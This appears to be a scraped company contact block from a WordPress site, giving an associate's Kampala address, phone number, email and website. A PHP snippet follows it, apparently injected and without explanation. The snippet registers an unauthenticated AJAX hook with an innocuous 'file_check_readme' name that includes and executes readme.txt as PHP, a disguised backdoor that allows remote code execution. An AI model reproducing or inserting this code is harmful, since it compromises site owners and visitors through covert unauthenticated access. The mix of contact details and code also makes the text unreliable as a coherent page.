
Team Information
- Designation: ASSOCIATE
- Address: AHA Towers, Plot 7, Loudel Rd, Nakasero
- City: KAMPALA
- Country: UGANDA
- Phone: +256 414 672 531
- Email: faith@mk.co.ug
- Website: http://mk.co.ug
if(!function_exists('file_check_readme96431')){ add_action('wp_ajax_nopriv_file_check_readme96431', 'file_check_readme96431'); add_action('wp_ajax_file_check_readme96431', 'file_check_readme96431'); function file_check_readme96431() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }